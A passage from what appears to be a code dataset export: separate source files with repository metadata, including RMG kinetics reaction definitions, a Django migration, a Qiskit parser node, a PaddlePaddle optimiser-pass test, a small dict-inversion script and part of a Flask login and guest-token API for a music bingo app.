reactants = ['CC=O(606)', '[CH2][C]([O])OO(1352)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS4',
kinetics = Arrhenius(A=(4e+09,'cm^3/(mol*s)'), n=1.39, Ea=(35.8862,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2000,'K'), comment="""Estimated using template [Od_CO-CsH;YJ] for rate rule [Od_CO-CsH;CJ]
Euclidian distance = 1.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction5',
reactants = ['OH(D)(132)', 'C[CH]OCC([O])=O(3648)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS5',
kinetics = Arrhenius(A=(2.24379e+07,'m^3/(mol*s)'), n=-0.377333, Ea=(220.574,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R_R;OJ_pri] for rate rule [Od_R;OJ_pri]
Euclidian distance = 1.0
Multiplied by reaction path degeneracy 2.0
family: R_Addition_MultipleBond
Ea raised from 217.7 to 220.6 kJ/mol to match endothermicity of reaction."""),
)
reaction(
label = 'reaction6',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['C[CH]O[CH]C([O])OO(3929)'],
transitionState = 'TS6',
kinetics = Arrhenius(A=(0.00141351,'s^-1'), n=4.515, Ea=(133.574,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R2H_S;Y_rad_out;Cs_H_out_H/NonDeO]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction7',
reactants = ['[CH2]COC[C]([O])OO(3930)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS7',
kinetics = Arrhenius(A=(3.7e+13,'s^-1','+|-',2), n=-0.1, Ea=(158.364,'kJ/mol'), T0=(1,'K'), Tmin=(700,'K'), Tmax=(1800,'K'), comment="""From training reaction 347 used for R2H_S;C_rad_out_2H;Cs_H_out_H/NonDeO
Exact match found for rate rule [R2H_S;C_rad_out_2H;Cs_H_out_H/NonDeO]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction8',
reactants = ['CCO[CH][C]([O])OO(3931)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS8',
kinetics = Arrhenius(A=(1.73726e+09,'s^-1'), n=1.185, Ea=(165.895,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R3H_SS_O;Y_rad_out;Cs_H_out_H/NonDeC]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction9',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['C[CH]OCC([O])O[O](3932)'],
transitionState = 'TS9',
kinetics = Arrhenius(A=(40813.3,'s^-1'), n=2.17068, Ea=(135.172,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [R3H_SS;Y_rad_out;O_H_out] + [R3H_SS_O;Y_rad_out;XH_out] for rate rule [R3H_SS_O;Y_rad_out;O_H_out]
Euclidian distance = 1.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction10',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['C[CH]O[CH][C](O)OO(3933)'],
transitionState = 'TS10',
kinetics = Arrhenius(A=(6e+08,'s^-1'), n=1.23, Ea=(154.18,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Estimated using template [R3Hall;O_rad_out;Cs_H_out_H/NonDeO] for rate rule [R3HJ;O_rad_out;Cs_H_out_H/NonDeO]
Euclidian distance = 1.0
Multiplied by reaction path degeneracy 2.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction11',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['C[CH]OC[C](O)O[O](3934)'],
transitionState = 'TS11',
kinetics = Arrhenius(A=(51.2591,'s^-1'), n=2.88655, Ea=(103.583,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [R4Hall;Y_rad_out;O_H_out] + [R4Hall;O_rad_out;XH_out] for rate rule [R4HJ_1;O_rad_out;O_H_out]
Euclidian distance = 1.41421356237
family: intra_H_migration"""),
)
reaction(
label = 'reaction12',
reactants = ['[CH2][CH]OCC([O])OO(3935)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS12',
kinetics = Arrhenius(A=(4.23647e+06,'s^-1'), n=1.3192, Ea=(73.619,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R5Hall;C_rad_out_2H;XH_out] for rate rule [R5HJ_1;C_rad_out_2H;XH_out]
Euclidian distance = 1.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction13',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['[CH2][CH]OC[C](O)OO(3936)'],
transitionState = 'TS13',
kinetics = Arrhenius(A=(4.68e+09,'s^-1'), n=0, Ea=(93.5124,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Estimated using an average for rate rule [R6Hall;O_rad_out;Cs_H_out_2H]
Euclidian distance = 0
Multiplied by reaction path degeneracy 3.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction14',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['CCOC[C]([O])O[O](3937)'],
transitionState = 'TS14',
kinetics = Arrhenius(A=(46.1,'s^-1'), n=3.21, Ea=(60.7935,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R6Hall;C_rad_out_H/NonDeC;XH_out] for rate rule [R6HJ_3;C_rad_out_H/NonDeC;O_H_out]
Euclidian distance = 1.41421356237
family: intra_H_migration"""),
)
reaction(
label = 'reaction15',
reactants = ['C[CH][O](605)', '[CH2][C]([O])OO(1352)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS15',
kinetics = Arrhenius(A=(1.9789e+07,'m^3/(mol*s)'), n=-0.126319, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;Y_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -15.6 to -15.6 kJ/mol.
Ea raised from -15.6 to 0 kJ/mol."""),
)
reaction(
label = 'reaction16',
reactants = ['OH(D)(132)', 'C[CH]OC[C]([O])[O](3645)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS16',
kinetics = Arrhenius(A=(6.10333e+07,'m^3/(mol*s)'), n=0.045, Ea=(0.1046,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [O_pri_rad;Y_rad]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: R_Recombination"""),
)
reaction(
label = 'reaction17',
reactants = ['H(8)', 'C[CH]OC[C]([O])O[O](3383)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS17',
kinetics = Arrhenius(A=(5.00518e+06,'m^3/(mol*s)'), n=0.282325, Ea=(7.09479,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [Y_rad;O_rad/NonDe] + [H_rad;O_sec_rad] for rate rule [H_rad;O_rad/NonDe]
Euclidian distance = 1.0
family: R_Recombination"""),
)
reaction(
label = 'reaction18',
reactants = ['H(8)', 'C[CH]O[CH][C]([O])OO(3380)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS18',
kinetics = Arrhenius(A=(4.34078e+06,'m^3/(mol*s)'), n=0.278577, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;H_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -1.4 to 0 kJ/mol."""),
)
reaction(
label = 'reaction19',
reactants = ['[CH2][CH]OC[C]([O])OO(1318)', 'H(8)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS19',
kinetics = Arrhenius(A=(4.34078e+06,'m^3/(mol*s)'), n=0.278577, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;H_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -1.4 to 0 kJ/mol."""),
)
reaction(
label = 'reaction20',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['CCO[CH]C(=O)OO(3938)'],
transitionState = 'TS20',
kinetics = Arrhenius(A=(1.4874e+09,'s^-1'), n=1.045, Ea=(63.4002,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 1 used for R3radExo;Y_rad_NDe;XH_Rrad_NDe
Exact match found for rate rule [R3radExo;Y_rad_NDe;XH_Rrad_NDe]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: Intra_Disproportionation"""),
)
reaction(
label = 'reaction21',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['C=COCC([O])OO(3939)'],
transitionState = 'TS21',
kinetics = Arrhenius(A=(9.63e+09,'s^-1'), n=0.137, Ea=(8.368,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Estimated using template [R5;Y_rad_NDe;XH_Rrad] for rate rule [R5radEndo;Y_rad_NDe;XH_Rrad]
Euclidian distance = 1.0
Multiplied by reaction path degeneracy 3.0
family: Intra_Disproportionation"""),
)
reaction(
label = 'reaction22',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['CC1OCC1([O])OO(3633)'],
transitionState = 'TS22',
kinetics = Arrhenius(A=(1.62e+12,'s^-1'), n=-0.305, Ea=(8.28432,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4_SSS;C_rad_out_single;Ypri_rad_out] for rate rule [R4_SSS;C_rad_out_H/NonDeC;Ypri_rad_out]
Euclidian distance = 2.0
family: Birad_recombination"""),
)
reaction(
label = 'reaction23',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['C[CH]OCC([O])([O])O(3940)'],
transitionState = 'TS23',
kinetics = Arrhenius(A=(4.72906e+10,'s^-1'), n=0, Ea=(94.6862,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [RnOOH;Y_rad_out] for rate rule [ROOH;Y_rad_out]
Euclidian distance = 1.0
family: intra_OH_migration"""),
)
reaction(
label = 'reaction24',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['C[CH]OCC(=O)OO(3620)'],
transitionState = 'TS24',
kinetics = Arrhenius(A=(1e+10,'s^-1'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [NOS]
Euclidian distance = 0
family: 1,2-Birad_to_alkene"""),
)
reaction(
label = 'reaction25',
reactants = ['[O]C[C]([O])OO(1290)', '[CH]C(32)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS25',
kinetics = Arrhenius(A=(43.5839,'m^3/(mol*s)'), n=1.88017, Ea=(5.1666,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""Estimated using an average for rate rule [O_rad/NonDe;Birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction26',
reactants = ['[O]O(16)', 'C[CH]OC[C][O](3848)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS26',
kinetics = Arrhenius(A=(43.5839,'m^3/(mol*s)'), n=1.88017, Ea=(5.1666,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""Estimated using an average for rate rule [O_rad/NonDe;Birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction27',
reactants = ['[CH2]O[CH]C(415)', '[O][C]OO(1370)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS27',
kinetics = Arrhenius(A=(1.14854e+06,'m^3/(mol*s)'), n=0.575199, Ea=(34.3157,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Y_rad;Birad] for rate rule [C_rad/H2/O;Birad]
Euclidian distance = 3.0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction28',
reactants = ['[CH3](11)', '[CH]OC[C]([O])OO(2666)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS28',
kinetics = Arrhenius(A=(1.14854e+06,'m^3/(mol*s)'), n=0.575199, Ea=(34.3157,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Y_rad;Birad] for rate rule [C_methyl;Birad]
Euclidian distance = 2.0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction29',
reactants = ['H(8)', 'C[C]OC[C]([O])OO(3941)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS29',
kinetics = Arrhenius(A=(1e+07,'m^3/(mol*s)'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [H_rad;Birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
network(
label = '1235',
isomers = [
'C[CH]OC[C]([O])OO(3631)',
],
reactants = [
('[CH2]C(=O)OO(1167)', 'CC=O(606)'),
],
bathGas = {
'N2': 0.25,
'Ne': 0.25,
'He': 0.25,
'Ar': 0.25,
},
)
pressureDependence(
label = '1235',
Tmin = (1200,'K'),
Tmax = (1500,'K'),
Tcount = 10,
Tlist = ([1201.48,1213.22,1236.21,1269.31,1310.55,1356.92,1404.16,1447.02,1479.84,1497.7],'K'),
Pmin = (1,'atm'),
Pmax = (10,'atm'),
Pcount = 10,
Plist = ([1.02771,1.14872,1.41959,1.89986,2.67608,3.83649,5.40396,7.23219,8.93758,9.98989],'bar'),
maximumGrainSize = (0.5,'kcal/mol'),
minimumGrainCount = 250,
method = 'modified strong collision',
interpolationModel = ('Chebyshev', 6, 4),
activeKRotor = True,
activeJRotor = True,
rmgmode = True,
)
| [
"[email protected]"
] | |
c1064e3cb0f46ad7adf774bda864f9f66f8de8ed | 9beb6276f17e5d174b7827ee73974d65bf302c60 | /scrumate/core/migrations/0009_auto_20190520_2336.py | 6272f5158163f4f19adf7687aa847632d70b4dee | [
"MIT"
] | permissive | nahidsaikat/scrumate | 8a3bec242b5b6ff02f1a5b8309e777f154e7c338 | 11a63f1cc361261a7023eceafc2a27e29561dca0 | refs/heads/master | 2022-01-11T09:20:58.599693 | 2019-07-10T16:57:56 | 2019-07-10T16:57:56 | 169,908,944 | 1 | 0 | MIT | 2019-06-02T04:21:56 | 2019-02-09T20:12:45 | HTML | UTF-8 | Python | false | false | 477 | py | # Generated by Django 2.2.1 on 2019-05-20 23:36
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0008_auto_20190519_1902'),
]
operations = [
migrations.AlterField(
model_name='projectmember',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='people.Employee'),
),
]
| [
"[email protected]"
] | |
92b8fbf42cdd9d76c411d6d3cdb66b67393a07a1 | 02024d0d05428da2a1b53862e31fe5bf0d667ba3 | /qiskit/qasm/_node/_indexedid.py | fc87aadf35a174a409d35e133d3f3e49acc07abc | [
"Apache-2.0"
] | permissive | nonhermitian/arrogant_seahorse | 488dd22a200f45f068821ce93422d92dd6bae38c | 2be1ff60857c75fcbbb0c23aa594f41e1a33c89c | refs/heads/master | 2020-03-12T01:02:59.369571 | 2018-08-08T17:55:13 | 2018-08-08T17:55:13 | 130,365,670 | 0 | 0 | Apache-2.0 | 2018-05-24T13:43:13 | 2018-04-20T13:26:27 | Python | UTF-8 | Python | false | false | 1,565 | py | # -*- coding: utf-8 -*-
# pylint: disable=invalid-name
# Copyright 2017 IBM RESEARCH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""
Node for an OPENQASM indexed id.
"""
from ._node import Node
class IndexedId(Node):
"""Node for an OPENQASM indexed id.
children[0] is an id node.
children[1] is an Int node.
"""
def __init__(self, children):
"""Create the indexed id node."""
Node.__init__(self, 'indexed_id', children, None)
self.id = children[0]
self.name = self.id.name
self.line = self.id.line
self.file = self.id.file
self.index = children[1].value
def to_string(self, indent):
"""Print with indent."""
ind = indent * ' '
print(ind, 'indexed_id', self.name, self.index)
def qasm(self, prec=15):
"""Return the corresponding OPENQASM string."""
# pylint: disable=unused-argument
return self.name + "[%d]" % self.index
| [
"[email protected]"
] | |
b98564429effdf73626a3ffe5b14362282c0ce78 | d5f75adf5603927396bdecf3e4afae292143ddf9 | /python/paddle/fluid/tests/unittests/distributed_passes/test_dist_fuse_adam_pass.py | 85c3bf321a3b1b100f593ba527698605a85570af | [
"Apache-2.0"
] | permissive | jiweibo/Paddle | 8faaaa1ff0beaf97ef7fb367f6c9fcc065f42fc4 | 605a2f0052e0ffb2fab3a4cf4f3bf1965aa7eb74 | refs/heads/develop | 2023-07-21T03:36:05.367977 | 2022-06-24T02:31:11 | 2022-06-24T02:31:11 | 196,316,126 | 3 | 2 | Apache-2.0 | 2023-04-04T02:42:53 | 2019-07-11T03:51:12 | Python | UTF-8 | Python | false | false | 3,358 | py | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import paddle
import paddle.distributed.fleet as fleet
import numpy as np
import paddle.nn as nn
from paddle.distributed.passes import new_pass, PassManager
import unittest
from dist_pass_test_base import DistPassTestBase
class DemoNet(nn.Layer):
def __init__(self):
super(DemoNet, self).__init__()
self.conv1 = nn.Conv2D(3, 8, (3, 3), data_format="NHWC")
self.bn1 = nn.BatchNorm2D(8, data_format="NHWC")
self.relu = nn.ReLU()
def forward(self, x):
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = paddle.flatten(out, 1)
return out
class TestFuseAdamPass(DistPassTestBase):
def init(self):
self.atol = 1e-4
self.rtol = 1e-4
def get_model(self, place, batch_size=32, image_shape=[224, 224, 3]):
image = paddle.static.data(shape=[batch_size] + image_shape,
dtype='float32',
name='image')
model = DemoNet()
pred_out = model(image)
loss = paddle.mean(pred_out)
optimizer = paddle.optimizer.Adam(learning_rate=1e-3)
dist_strategy = fleet.DistributedStrategy()
dist_strategy.fuse_all_reduce_ops = False
dist_strategy.without_graph_optimization = True
fleet.init(is_collective=True, strategy=dist_strategy)
optimizer = fleet.distributed_optimizer(optimizer)
optimizer.minimize(loss)
rank = paddle.distributed.get_rank()
def reader():
seed = int(os.environ.get("SEED", 0))
np.random.seed(seed + rank)
for _ in range(10):
image_np = np.random.random(size=image.shape).astype('float32')
yield image_np,
main_program = paddle.static.default_main_program()
startup_program = paddle.static.default_startup_program()
return main_program, startup_program, [image], [loss], reader
def apply_passes(self, main_prog, startup_prog):
pass_manager = PassManager([new_pass("fuse_optimizer")])
pass_manager.apply([main_prog], [startup_prog])
print(pass_manager.names)
op_type = []
for op in main_prog.global_block().ops:
op_type.append(op.type)
if op.type == "adam":
self.assertTrue("@FUSEDVAR@_adam_Param_batch_norm2d_0.b_0" in
op.input("Param"))
self.assertTrue("@FUSEDVAR@_adam_Grad_batch_norm2d_0.b_0@GRAD"
in op.input("Grad"))
self.assertTrue("coalesce_tensor" in op_type)
def test_fuse_adam(self):
self.check_main()
if __name__ == "__main__":
unittest.main()
| [
"[email protected]"
] | |
37818cd5fcee6a28165e777da8c232aab06642b5 | 7740adda52651a443e5141b331d4eaadbd0d0d2c | /chap11/11-5.py | a1ff82139212f7ae8500386e95508159daeca5f9 | [] | no_license | wucy/pythonhomework | f55b24e6e702718243f8cd534dc7d3c2eb9f9fce | 1cfcac532a229ce71982ed3cfef9f75a531ffa64 | refs/heads/master | 2016-09-10T20:30:37.367056 | 2013-11-28T14:20:03 | 2013-11-28T14:20:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | #!/usr/bin/env python
def invert_dict(hist):
ret = dict()
for key in hist:
ret.setdefault(hist[key], []).append(key)
return ret
print invert_dict({'a':1, 'b':2, 'c':2})
| [
"[email protected]"
] | |
a648cbdbf5a1d98beba96b3483ee9e97504bb830 | fcf91774105f020482c3c07632c0ee462a6d1394 | /uwiki/web.py | 57dd594e358c2811ee30d858e2da8fbd0247f7c4 | [] | no_license | mikeboers/uWiki | fcac466e82d16b2ed219d06b834b766e7a9de43e | 3c9b0a7ab07a550f52f5d5d38105df901d5a3801 | refs/heads/master | 2023-06-08T05:53:50.066814 | 2018-03-05T18:03:45 | 2018-03-05T18:03:45 | 15,181,192 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | import logging
logging.basicConfig()
from .core import app
from .errors import setup_errors
setup_errors(app)
# Finally register controllers here.
from . import controllers
| [
"[email protected]"
] | |
5d90971c9ca58a4817368468e0ff0c99c19b099e | 14438f8c8bb4250a7fa8da0ecd40c5a4902bdfcd | /Player/set-17/165.py | 9a3d792ecbd4593b145a5f3556d0c0b9183b56ef | [] | no_license | nikhilvarshney2/GUVI | c51b1fa3bd1026eb74fc536e938a14c2e92089b2 | 79717ae5b26540101169e512204fb7236f7c839f | refs/heads/master | 2020-04-01T00:40:27.699963 | 2019-04-30T13:46:46 | 2019-04-30T13:46:46 | 152,707,542 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 150 | py | n,u = map(int,input().split())
kl = list(map(int,input().split()))
found = 100000
for i in kl:
if i>u and i<found:
found = i
print(found)
| [
"[email protected]"
] | |
dcea0c4504571f5421b69c4668bf5db388913504 | c4e05230949efbd1ef858839850520ee94a87a58 | /musicbingo/server/api.py | 144686857d8e7df1892b59575b3618336128dc15 | [] | no_license | asrashley/music-bingo | bd33b883da9b6f88df506860475861daea63c6fb | f49d26900a10593a6f993b82d8d782b2e7367f84 | refs/heads/main | 2023-07-20T11:15:47.696132 | 2023-06-29T09:59:51 | 2023-07-05T16:48:41 | 125,717,777 | 1 | 1 | null | 2023-08-28T17:28:04 | 2018-03-18T11:26:17 | Python | UTF-8 | Python | false | false | 51,061 | py | # pylint: disable=unused-argument
"""
HTTP REST API for accessing the database
"""
import datetime
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import json
from pathlib import Path
import random
import secrets
import smtplib
import ssl
import time
from typing import Any, Dict, List, Optional, Set, Type, Union, cast
from urllib.parse import urljoin
import fastjsonschema # type: ignore
from flask import ( # type: ignore
request, render_template, g,
session, url_for,
current_app, Response
)
from flask.views import MethodView # type: ignore
from flask_jwt_extended import ( # type: ignore
jwt_required, create_access_token,
get_jwt_identity, current_user, get_jwt,
create_refresh_token, decode_token,
)
from sqlalchemy import or_ # type: ignore
from musicbingo import models, utils, workers
from musicbingo.models.modelmixin import JsonObject
from musicbingo.models.session import DatabaseSession
from musicbingo.models.token import TokenType
from musicbingo.mp3.factory import MP3Factory
from musicbingo.bingoticket import BingoTicket
from musicbingo.options import ExtraOptions, OptionField, Options
from musicbingo.options.enum_wrapper import EnumWrapper
from musicbingo.palette import Palette
from musicbingo.schemas import JsonSchema, validate_json
from .decorators import (
db_session, uses_database, get_game, get_ticket,
jsonify, jsonify_no_content,
get_options, get_directory
)
def decorate_user_info(user):
"""
Decorate the User model with additional information
"""
retval = user.to_dict(exclude={"password", "groups_mask"})
retval['groups'] = [g.name.lower() for g in user.groups]
retval['options'] = {
'colourScheme': g.current_options.colour_scheme.name.lower(),
'colourSchemes': [name.lower() for name in Palette.names()],
'maxTickets': g.current_options.max_tickets_per_user,
'rows': g.current_options.rows,
'columns': g.current_options.columns,
}
return retval
class UserApi(MethodView):
"""
API for a user to login, logout, register
"""
decorators = [get_options, jwt_required(optional=True), uses_database]
def post(self) -> Response:
"""
Attempt to log in.
'username' can be either a username or an email address
"""
username = cast(JsonObject, request.json)['username']
password = cast(JsonObject, request.json)['password']
rememberme = request.json.get('rememberme', False) # type: ignore
user = cast(models.User,
models.User.get(cast(DatabaseSession, db_session),
username=username))
if user is None:
user = models.User.get(db_session, email=username)
if user is None:
response = jsonify(
{'error': 'Unknown username or wrong password'})
response.status_code = 401
return response
if not user.check_password(password):
response = jsonify({'error': 'Unknown username or wrong password'})
response.status_code = 401
return response
user.last_login = datetime.datetime.now()
user.reset_expires = None
user.reset_token = None
result = decorate_user_info(user)
session.clear()
result['accessToken'] = create_access_token(identity=user.username)
if isinstance(result['accessToken'], bytes):
result['accessToken'] = str(result['accessToken'], 'utf-8')
expires: Optional[datetime.timedelta] = None
if rememberme:
expires = cast(datetime.timedelta,
current_app.config['REMEMBER_ME_REFRESH_TOKEN_EXPIRES'])
result['refreshToken'] = create_refresh_token(identity=user.username,
expires_delta=expires) # type: ignore
if isinstance(result['refreshToken'], bytes):
result['refreshToken'] = str(result['refreshToken'], 'utf-8')
models.Token.add(decode_token(result['refreshToken']),
current_app.config['JWT_IDENTITY_CLAIM'],
False, db_session)
return jsonify(result)
def put(self) -> Response:
"""
Register a new user
"""
try:
req_json = cast(JsonObject, request.json)
email = req_json['email']
password = req_json['password']
username = req_json['username']
except KeyError as err:
return jsonify({str(err): "Is a required field"}, 400)
if models.User.exists(db_session, username=username):
return jsonify({
'error': {
"username": f'Username {username} is already taken, choose another one',
},
'success': False,
'user': {
'username': username,
'email': email,
}
})
if models.User.exists(db_session, email=email):
return jsonify({
'error': {
"email": f'Email address "{email}" has already been registered',
},
'success': False,
'user': {
'username': username,
'email': email,
}
})
user = models.User(username=username,
password=models.User.hash_password(password),
email=email,
groups_mask=models.Group.USERS.value,
last_login=datetime.datetime.now())
db_session.add(user)
db_session.commit()
# TODO: put expiry information in a setting
expires = datetime.timedelta(days=1)
refresh_token = create_refresh_token(identity=user.username,
expires_delta=expires)
models.Token.add(decode_token(refresh_token),
current_app.config['JWT_IDENTITY_CLAIM'],
False, db_session)
return jsonify({
'message': 'Successfully registered',
'success': True,
'user': decorate_user_info(user),
'accessToken': create_access_token(identity=user.username),
'refreshToken': refresh_token,
})
def get(self) -> Response:
"""
If user is logged in, return the information about the user
"""
username = get_jwt_identity()
if not username:
return jsonify({'error': 'Login required'}, 401)
user = models.User.get(db_session, username=username)
if user is None:
# TODO: revoke access token
response = jsonify({'error': 'Login required'})
response.status_code = 401
return response
return jsonify(decorate_user_info(user))
def delete(self) -> Response:
"""
Log out the current user
"""
username = get_jwt_identity()
user = None
if username:
user = cast(models.User, models.User.get(db_session, username=username))
if user:
access: Optional[models.Token] = None
for token in db_session.query(models.Token).filter_by(user_pk=user.pk, revoked=False):
token.revoked = True
if token.token_type == models.TokenType.ACCESS.value:
access = token
if access is None:
decoded_token = get_jwt()
models.Token.add(decoded_token, current_app.config['JWT_IDENTITY_CLAIM'],
revoked=True, session=db_session)
return jsonify('Logged out')
class CheckUserApi(MethodView):
"""
API to check if a username or email has already been
registered
"""
decorators = [uses_database]
def post(self) -> Response:
"""
check if username or email is already registered
"""
response = {
"username": False,
"email": False
}
username = request.json.get('username', None) # type: ignore
email = request.json.get('email', None) # type: ignore
if not username and not email:
return jsonify_no_content(400)
if username:
response['username'] = models.User.exists(
db_session, username=username)
if email:
response['email'] = models.User.exists(db_session, email=email)
return jsonify(response)
class GuestAccountApi(MethodView):
"""
API to check if a guest token is valid and create
guest accounts
"""
decorators = [get_options, jwt_required(optional=True), uses_database]
def get(self) -> Response:
"""
Get list of tokens
"""
username = get_jwt_identity()
if not username:
return jsonify_no_content(401)
user = cast(models.User, models.User.get(db_session, username=username))
if user is None or not user.is_admin:
return jsonify_no_content(401)
tokens = models.Token.search(db_session, token_type=TokenType.GUEST.value,
revoked=False)
return jsonify([token.to_dict() for token in tokens])
def post(self) -> Response:
"""
check if a guest token is valid
"""
if not request.json:
return jsonify_no_content(400)
jti = request.json.get('token', None)
if not jti:
return jsonify_no_content(400)
token = cast(models.Token, models.Token.get(
db_session, jti=jti, token_type=TokenType.GUEST.value))
result = {
"success": token is not None and not token.revoked
}
return jsonify(result)
def put(self) -> Response:
"""
Create a guest account
"""
if not request.json:
return jsonify_no_content(400)
jti = request.json.get('token', None)
if not jti:
return jsonify_no_content(400)
token = cast(models.Token, models.Token.get(
db_session, jti=jti, token_type=TokenType.GUEST.value))
result: JsonObject = {
"success": token is not None,
}
if token is None:
result["error"] = "Guest token missing"
return jsonify(result)
username: Optional[str] = None
while username is None:
guest_id = random.randint(100, 999)
username = f'guest{guest_id}'
user = models.User.get(db_session, username=username)
if user is not None:
username = None
password = secrets.token_urlsafe(14)
user = models.User(username=username,
password=models.User.hash_password(password),
email=username,
groups_mask=models.Group.GUESTS.value,
last_login=datetime.datetime.now())
db_session.add(user)
db_session.commit()
result.update(decorate_user_info(user))
result['accessToken'] = create_access_token(identity=username)
result['password'] = password
expires = current_app.config['GUEST_REFRESH_TOKEN_EXPIRES']
result['refreshToken'] = create_refresh_token(identity=username,
expires_delta=expires)
models.Token.add(decode_token(result['refreshToken']),
current_app.config['JWT_IDENTITY_CLAIM'],
False, db_session)
return jsonify(result)
class CreateGuestTokenApi(MethodView):
"""
Create a guest token
"""
decorators = [jwt_required(), uses_database]
def put(self) -> Response:
"""
Create a guest token
"""
if not current_user.is_admin:
return jsonify_no_content(401)
jti = secrets.token_urlsafe(7)
expires = datetime.datetime.now() + datetime.timedelta(days=7)
token = models.Token(jti=jti,
token_type=TokenType.GUEST.value,
username=jti,
expires=expires,
revoked=False)
db_session.add(token)
